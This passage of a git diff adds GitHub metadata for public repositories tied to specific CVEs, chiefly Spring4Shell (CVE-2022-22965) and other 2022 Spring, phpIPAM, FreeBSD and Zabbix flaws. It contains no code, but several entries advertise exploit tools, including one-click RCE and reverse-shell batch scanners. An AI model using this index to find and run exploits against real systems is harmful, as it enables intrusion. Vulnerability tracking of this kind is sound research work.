+ "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 563378340, + "name": "Fast-CVE-2022-22965", + "full_name": "iloveflag\/Fast-CVE-2022-22965", + "owner": { + "login": "iloveflag", + "id": 25424842, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25424842?v=4", + "html_url": "https:\/\/github.com\/iloveflag", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iloveflag\/Fast-CVE-2022-22965", + "description": "CVE-2022-22965图形化检测工具", + "fork": false, + "created_at": "2022-11-08T13:45:35Z", + "updated_at": "2023-02-07T02:30:57Z", + "pushed_at": "2022-11-08T14:15:29Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 571622287, + "name": "CVE-2022-22965-PoC", + "full_name": "ClemExp\/CVE-2022-22965-PoC", + "owner": { + "login": "ClemExp", + "id": 29142602, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29142602?v=4", + "html_url": "https:\/\/github.com\/ClemExp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ClemExp\/CVE-2022-22965-PoC", + "description": null, + "fork": false, + "created_at": "2022-11-28T14:28:07Z", + "updated_at": "2022-11-28T14:28:07Z", + "pushed_at": "2022-11-28T14:28:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 571625311, + "name": "SSE4-CVE-2022-22965", + "full_name": "clemoregan\/SSE4-CVE-2022-22965", + "owner": { + "login": "clemoregan", + "id": 108123459, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108123459?v=4", + "html_url": "https:\/\/github.com\/clemoregan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/clemoregan\/SSE4-CVE-2022-22965", + "description": "CVE-2022-22965 proof of concept", + "fork": false, + "created_at": "2022-11-28T14:34:51Z", + "updated_at": "2022-11-29T04:29:29Z", + "pushed_at": "2022-11-28T15:26:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 577393656, + "name": "CVE-2022-22965", + "full_name": "devengpk\/CVE-2022-22965", + "owner": { + "login": "devengpk", + "id": 41437020, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41437020?v=4", + "html_url": "https:\/\/github.com\/devengpk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/devengpk\/CVE-2022-22965", + "description": null, + "fork": false, + "created_at": "2022-12-12T16:30:05Z", + "updated_at": "2022-12-12T16:50:14Z", + "pushed_at": "2022-12-16T19:17:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 582867088, + "name": "CVE-2022-22965-rexbb", + "full_name": "zangcc\/CVE-2022-22965-rexbb", + "owner": { + "login": "zangcc", + "id": 64825932, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64825932?v=4", + "html_url": "https:\/\/github.com\/zangcc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zangcc\/CVE-2022-22965-rexbb", + "description": "CVE-2022-22965\\Spring-Core-RCE核弹级别漏洞的rce图形化GUI一键利用工具,基于JavaFx开发,图形化操作更简单,提高效率。", + "fork": false, + "created_at": "2022-12-28T04:50:16Z", + "updated_at": "2024-12-26T10:42:15Z", + "pushed_at": "2023-11-14T03:08:10Z", + "stargazers_count": 101, + "watchers_count": 101, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 101, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 584868904, + "name": "Spring4Shell-CVE-2022-22965-POC", + "full_name": "ajith737\/Spring4Shell-CVE-2022-22965-POC", + "owner": { + "login": "ajith737", + "id": 72512571, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72512571?v=4", + "html_url": "https:\/\/github.com\/ajith737", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ajith737\/Spring4Shell-CVE-2022-22965-POC", + "description": "User friendly Spring4Shell POC", + "fork": false, + "created_at": "2023-01-03T18:15:07Z", + "updated_at": "2023-01-03T18:15:14Z", + "pushed_at": "2023-01-03T18:53:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 608448692, + "name": "CVE-2022-22965", + "full_name": "c33dd\/CVE-2022-22965", + "owner": { + "login": "c33dd", + "id": 63436417, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63436417?v=4", + "html_url": "https:\/\/github.com\/c33dd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c33dd\/CVE-2022-22965", + "description": " 🚀 Exploit for Spring core RCE in C [ wip ]", + "fork": false, + "created_at": "2023-03-02T03:09:39Z", + "updated_at": "2023-02-28T17:01:21Z", + "pushed_at": "2023-02-28T16:49:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 613032720, + "name": "Spring4Shell-PoC-exploit", + "full_name": "gokul-ramesh\/Spring4Shell-PoC-exploit", + "owner": { + "login": "gokul-ramesh", + "id": 65040016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65040016?v=4", + "html_url": "https:\/\/github.com\/gokul-ramesh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gokul-ramesh\/Spring4Shell-PoC-exploit", + "description": "Demonstrable Proof of Concept Exploit for Spring4Shell Vulnerability (CVE-2022-22965)", + "fork": false, + "created_at": "2023-03-12T17:37:51Z", + "updated_at": "2024-06-24T06:32:48Z", + "pushed_at": "2023-03-17T14:30:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-22965", + "exploit-poc", + "spring4shell" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 647731640, + "name": "Telstra-Cybersecurity-Virtual-Experience-", + "full_name": "bL34cHig0\/Telstra-Cybersecurity-Virtual-Experience-", + "owner": { + "login": "bL34cHig0", + "id": 133022207, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/133022207?v=4", + "html_url": "https:\/\/github.com\/bL34cHig0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bL34cHig0\/Telstra-Cybersecurity-Virtual-Experience-", + "description": "A simple python script for a firewall rule that blocks incoming requests based on the Spring4Shell (CVE-2022-22965) vulnerability", + "fork": false, + "created_at": "2023-05-31T12:04:25Z", + "updated_at": "2024-09-19T04:14:46Z", + "pushed_at": "2024-03-19T13:42:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "firewall-rules", + "incident-response", + "malware-analysis", + "network-analysis", + "python", + "python3", + "pythonscript", + "spring4shell", + "tomcat-server", + "webserver", + "zeroday", + "zeroday-attack" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 649060182, + "name": "CVE-2022-22965", + "full_name": "BKLockly\/CVE-2022-22965", + "owner": { + "login": "BKLockly", + "id": 113906689, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113906689?v=4", + "html_url": "https:\/\/github.com\/BKLockly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BKLockly\/CVE-2022-22965", + "description": "Poc&Exp,支持批量扫描,反弹shell", + "fork": false, + "created_at": "2023-06-03T16:39:50Z", + "updated_at": "2023-10-12T17:15:11Z", + "pushed_at": "2023-06-04T03:51:56Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 650528662, + "name": "Spring4Shell", + "full_name": "dbgee\/Spring4Shell", + "owner": { + "login": "dbgee", + "id": 46910972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46910972?v=4", + "html_url": "https:\/\/github.com\/dbgee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dbgee\/Spring4Shell", + "description": "Spring rce environment for CVE-2022-22965", + "fork": false, + "created_at": "2023-06-07T09:02:50Z", + "updated_at": "2023-06-08T03:38:35Z", + "pushed_at": "2023-06-08T03:37:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 656168817, + "name": "CVE-2022-22965-Spring4Shell", + "full_name": "jakabakos\/CVE-2022-22965-Spring4Shell", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/CVE-2022-22965-Spring4Shell", + "description": "PoC and exploit for CVE-2022-22965 Spring4Shell", + "fork": false, + "created_at": "2023-06-20T11:45:29Z", + "updated_at": "2024-06-06T11:59:00Z", + "pushed_at": "2023-06-21T10:28:40Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 686301684, + "name": "Spring4Shell-CVE-2022-22965", + "full_name": "sohamsharma966\/Spring4Shell-CVE-2022-22965", + "owner": { + "login": "sohamsharma966", + "id": 72042665, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72042665?v=4", + "html_url": "https:\/\/github.com\/sohamsharma966", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sohamsharma966\/Spring4Shell-CVE-2022-22965", + "description": null, + "fork": false, + "created_at": "2023-09-02T10:41:05Z", + "updated_at": "2023-09-02T10:41:30Z", + "pushed_at": "2023-09-02T10:51:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 717886733, + "name": "CVE-2022-22965", + "full_name": "LucasPDiniz\/CVE-2022-22965", + "owner": { + "login": "LucasPDiniz", + "id": 57265360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57265360?v=4", + "html_url": "https:\/\/github.com\/LucasPDiniz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LucasPDiniz\/CVE-2022-22965", + "description": "Spring4Shell Vulnerability RCE - CVE-2022-22965 ", + "fork": false, + "created_at": "2023-11-12T22:15:32Z", + "updated_at": "2024-06-30T21:57:34Z", + "pushed_at": "2024-06-30T21:57:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "2022", + "cve-2022-22965", + "spring", + "spring4shell", + "springboot", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 794376820, + "name": "SpringFramework_CVE-2022-22965_RCE", + "full_name": "xsxtw\/SpringFramework_CVE-2022-22965_RCE", + "owner": { + "login": "xsxtw", + "id": 168295718, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168295718?v=4", + "html_url": "https:\/\/github.com\/xsxtw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xsxtw\/SpringFramework_CVE-2022-22965_RCE", + "description": null, + "fork": false, + "created_at": "2024-05-01T02:36:13Z", + "updated_at": "2024-05-01T02:39:16Z", + "pushed_at": "2024-05-01T02:39:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 882127199, + "name": "Block-Spring4Shell", + "full_name": "SkyM1raj\/Block-Spring4Shell", + "owner": { + "login": "SkyM1raj", + "id": 141164867, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141164867?v=4", + "html_url": "https:\/\/github.com\/SkyM1raj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SkyM1raj\/Block-Spring4Shell", + "description": "POC firewall with rules designed to detect and block Spring4Shell vulnerability (CVE-2022-22965) exploit", + "fork": false, + "created_at": "2024-11-02T00:26:02Z", + "updated_at": "2024-12-15T00:16:07Z", + "pushed_at": "2024-12-15T00:16:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 883824974, + "name": "Expoitation-de-la-vuln-rabilit-CVE-2022-22965", + "full_name": "guigui237\/Expoitation-de-la-vuln-rabilit-CVE-2022-22965", + "owner": { + "login": "guigui237", + "id": 184559460, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/184559460?v=4", + "html_url": "https:\/\/github.com\/guigui237", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/guigui237\/Expoitation-de-la-vuln-rabilit-CVE-2022-22965", + "description": null, + "fork": false, + "created_at": "2024-11-05T16:30:00Z", + "updated_at": "2024-11-06T23:04:42Z", + "pushed_at": "2024-11-06T23:04:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-22966.json b/2022/CVE-2022-22966.json new file mode 100644 index 0000000000..5c5fcaece2 --- /dev/null +++ b/2022/CVE-2022-22966.json @@ -0,0 +1,33 @@ +[ + { + "id": 519963010, + "name": "CVE-2022-22966", + "full_name": "bb33bb\/CVE-2022-22966", + "owner": { + "login": "bb33bb", + "id": 5463104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5463104?v=4", + "html_url": "https:\/\/github.com\/bb33bb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bb33bb\/CVE-2022-22966", + "description": "Exploit for SpringShell.", + "fork": false, + "created_at": "2022-08-01T04:29:02Z", + "updated_at": "2022-08-01T04:28:59Z", + "pushed_at": "2022-07-31T08:26:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22970.json b/2022/CVE-2022-22970.json new file mode 100644 index 0000000000..3529e3b8c9 --- /dev/null +++ b/2022/CVE-2022-22970.json @@ -0,0 +1,33 @@ +[ + { + "id": 891177744, + "name": "CVE-2022-22970", + "full_name": "Performant-Labs\/CVE-2022-22970", + "owner": { + "login": "Performant-Labs", + "id": 35463594, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35463594?v=4", + "html_url": "https:\/\/github.com\/Performant-Labs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Performant-Labs\/CVE-2022-22970", + "description": null, + "fork": false, + "created_at": "2024-11-19T21:36:09Z", + "updated_at": "2024-11-22T17:48:39Z", + "pushed_at": "2024-11-22T17:48:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22971.json b/2022/CVE-2022-22971.json new file mode 100644 index 0000000000..f391c62a17 --- /dev/null +++ b/2022/CVE-2022-22971.json @@ -0,0 +1,33 @@ +[ + { + "id": 571017067, + "name": "CVE-2022-22971", + "full_name": "tchize\/CVE-2022-22971", + "owner": { + "login": "tchize", + "id": 7933441, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7933441?v=4", + "html_url": "https:\/\/github.com\/tchize", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tchize\/CVE-2022-22971", + "description": null, + "fork": false, + "created_at": "2022-11-26T22:04:38Z", + "updated_at": "2022-12-10T16:57:07Z", + "pushed_at": "2022-11-27T00:28:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22978.json b/2022/CVE-2022-22978.json index d52dca9c39..417dfbe711 100644 --- a/2022/CVE-2022-22978.json +++ b/2022/CVE-2022-22978.json @@ -65,5 +65,160 @@ "watchers": 11, "score": 0, "subscribers_count": 1 + }, + { + "id": 513515771, + "name": "CVE-2022-22978", + "full_name": "aeifkz\/CVE-2022-22978", + "owner": { + "login": "aeifkz", + "id": 2063610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2063610?v=4", + "html_url": "https:\/\/github.com\/aeifkz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aeifkz\/CVE-2022-22978", + "description": "CVE-2022-22978 POC Project", + "fork": false, + "created_at": "2022-07-13T12:38:26Z", + "updated_at": "2023-11-29T07:24:06Z", + "pushed_at": "2022-07-14T02:21:13Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 608016738, + "name": "CVE-2022-22978", + "full_name": "umakant76705\/CVE-2022-22978", + "owner": { + "login": "umakant76705", + "id": 31900360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31900360?v=4", + "html_url": "https:\/\/github.com\/umakant76705", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/umakant76705\/CVE-2022-22978", + "description": null, + "fork": false, + "created_at": "2023-03-01T06:21:56Z", + "updated_at": "2023-03-17T15:20:20Z", + "pushed_at": "2023-03-01T06:22:08Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 614770479, + "name": "CVE-2022-22978", + "full_name": "Raghvendra1207\/CVE-2022-22978", + "owner": { + "login": "Raghvendra1207", + "id": 128030511, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128030511?v=4", + "html_url": "https:\/\/github.com\/Raghvendra1207", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Raghvendra1207\/CVE-2022-22978", + "description": null, + "fork": false, + "created_at": "2023-03-16T09:34:17Z", + "updated_at": "2023-03-16T09:34:49Z", + "pushed_at": "2023-09-08T10:26:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 801924792, + "name": "CVE-2022-22978-demo", + "full_name": "wan9xx\/CVE-2022-22978-demo", + "owner": { + "login": "wan9xx", + "id": 65795483, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65795483?v=4", + "html_url": "https:\/\/github.com\/wan9xx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wan9xx\/CVE-2022-22978-demo", + "description": "CVE-2022-22978漏洞实例代码", + "fork": false, + "created_at": "2024-05-17T07:26:54Z", + "updated_at": "2024-05-20T03:52:35Z", + "pushed_at": "2024-05-20T03:52:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 836181828, + "name": "CVE-2022-22978", + "full_name": "BoB13-Opensource-Contribution-Team9\/CVE-2022-22978", + "owner": { + "login": "BoB13-Opensource-Contribution-Team9", + "id": 177111000, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/177111000?v=4", + "html_url": "https:\/\/github.com\/BoB13-Opensource-Contribution-Team9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BoB13-Opensource-Contribution-Team9\/CVE-2022-22978", + "description": "CVE-2022-22978's Nuclei-Template", + "fork": false, + "created_at": "2024-07-31T10:12:33Z", + "updated_at": "2024-07-31T10:12:34Z", + "pushed_at": "2024-07-31T10:12:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 } ] \ No newline at end of file diff --git a/2022/CVE-2022-22980.json b/2022/CVE-2022-22980.json index e9f6bc8a31..944787bd97 100644 --- a/2022/CVE-2022-22980.json +++ b/2022/CVE-2022-22980.json @@ -153,5 +153,36 @@ "watchers": 5, "score": 0, "subscribers_count": 1 + }, + { + "id": 513546145, + "name": "Spring_cve-2022-22980", + "full_name": "Vulnmachines\/Spring_cve-2022-22980", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/Spring_cve-2022-22980", + "description": "spring data mongodb remote code execution | cve-2022-22980 poc", + "fork": false, + "created_at": "2022-07-13T14:07:26Z", + "updated_at": "2023-11-30T08:56:54Z", + "pushed_at": "2022-07-13T14:13:51Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-23046.json b/2022/CVE-2022-23046.json index d68f6b0a84..78d1c77673 100644 --- a/2022/CVE-2022-23046.json +++ b/2022/CVE-2022-23046.json @@ -1,4 +1,66 @@ [ + { + "id": 450827017, + "name": "CVE-2022-23046", + "full_name": "jcarabantes\/CVE-2022-23046", + "owner": { + "login": "jcarabantes", + "id": 9590425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9590425?v=4", + "html_url": "https:\/\/github.com\/jcarabantes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jcarabantes\/CVE-2022-23046", + "description": null, + "fork": false, + "created_at": "2022-01-22T13:35:40Z", + "updated_at": "2022-02-16T08:00:53Z", + "pushed_at": "2022-01-24T17:29:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 459366538, + "name": "CVE-2022-23046", + "full_name": "dnr6419\/CVE-2022-23046", + "owner": { + "login": "dnr6419", + "id": 43310843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43310843?v=4", + "html_url": "https:\/\/github.com\/dnr6419", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dnr6419\/CVE-2022-23046", + "description": "SQL Injection Vulnerability on PhpIPAM v1.4.4", + "fork": false, + "created_at": "2022-02-15T00:00:22Z", + "updated_at": "2023-01-22T10:15:22Z", + "pushed_at": "2022-02-15T00:25:16Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, { "id": 485887908, "name": "phpipam_1.4.4", diff --git a/2022/CVE-2022-23093.json b/2022/CVE-2022-23093.json new file mode 100644 index 0000000000..551c26ad0d --- /dev/null +++ b/2022/CVE-2022-23093.json @@ -0,0 +1,76 @@ +[ + { + "id": 608826023, + "name": "CVE-2022-23093", + "full_name": "Inplex-sys\/CVE-2022-23093", + "owner": { + "login": "Inplex-sys", + "id": 69421356, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69421356?v=4", + "html_url": "https:\/\/github.com\/Inplex-sys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Inplex-sys\/CVE-2022-23093", + "description": "The FreeBSD ICMP buffer overflow, freebsd buffer overflow poc", + "fork": false, + "created_at": "2023-03-02T20:18:54Z", + "updated_at": "2024-11-17T22:17:14Z", + "pushed_at": "2023-03-25T17:41:13Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "buffer-overflow", + "cve-2022-23093", + "draytek-vigor-rce", + "exploit", + "exploits", + "freebsd", + "freebsd-exploit", + "icmp", + "poc", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 775885856, + "name": "DrayTek-Exploit", + "full_name": "Symbolexe\/DrayTek-Exploit", + "owner": { + "login": "Symbolexe", + "id": 140549630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140549630?v=4", + "html_url": "https:\/\/github.com\/Symbolexe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Symbolexe\/DrayTek-Exploit", + "description": "CVE-2022-23093 FreeBSD Stack-Based Overflow", + "fork": false, + "created_at": "2024-03-22T08:38:40Z", + "updated_at": "2024-03-22T08:46:36Z", + "pushed_at": "2024-03-22T08:46:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-23131.json b/2022/CVE-2022-23131.json index 92de195577..7312c58f25 100644 --- a/2022/CVE-2022-23131.json +++ b/2022/CVE-2022-23131.json @@ -1,4 +1,66 @@ [ + { + "id": 460689920, + "name": "CVE-2022-23131", + "full_name": "qq1549176285\/CVE-2022-23131", + "owner": { + "login": "qq1549176285", + "id": 38514188, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38514188?v=4", + "html_url": "https:\/\/github.com\/qq1549176285", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qq1549176285\/CVE-2022-23131", + "description": null, + "fork": false, + "created_at": "2022-02-18T03:03:26Z", + "updated_at": "2022-02-18T03:03:26Z", + "pushed_at": "2022-02-18T03:03:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 460773028, + "name": "CVE-2022-23131", + "full_name": "jweny\/CVE-2022-23131", + "owner": { + "login": "jweny", + "id": 26767398, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26767398?v=4", + "html_url": "https:\/\/github.com\/jweny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jweny\/CVE-2022-23131", + "description": "cve-2022-23131 exp", + "fork": false, + "created_at": 